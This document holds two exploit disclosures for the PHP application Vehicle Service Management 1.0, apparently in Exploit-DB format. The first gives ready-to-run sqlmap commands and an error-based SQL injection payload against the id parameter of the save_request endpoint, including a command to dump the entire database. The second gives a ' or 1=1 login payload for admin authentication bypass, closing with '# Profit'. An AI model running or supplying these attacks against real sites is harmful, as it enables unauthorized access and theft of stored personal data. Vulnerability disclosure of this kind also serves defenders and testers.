# Exploit Title: Vehicle Service Managment 1.0 - SQL Injection Error Based # Date: 2021-10-02 # Exploit Author: RICHARD JONES # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 - Open sqlmap Step 2 – Enter the payload string for sqlmap (edit localhost to site address) Setp 3 - Dump database info. SQLMAP Command: sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --technique=E Results: Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 8850 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(8850=8850,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- bdrq&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick Up&pickup_address=aa Step 3: Dump the entire database. sqlmap -u "http://localhost/vehicle_service/classes/Master.php?f=save_request" --data "id=1&category_id=2&owner_name=aa&contact=aa&email=aaaa@a.com&address=aaaaaaaaa&vehicle_name=aaaa&vehicle_registration_number=aaaa&vehicle_model=aaaa&service_id[]=3&service_type=Pick+Up&pickup_address=aa" -p id --batch --dump # Exploit Title: Vehicle Service Managment 1.0 - SQL Authentication Bypass # Date: 2021-10-02 # Exploit Author: RICHARD JONES # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 - Goto http://site/admin/login.php (to login) Step 2 – Enter the payload below for username and password Setp 3 - Login as admin! Payload: ' or 1=1-- - # Profit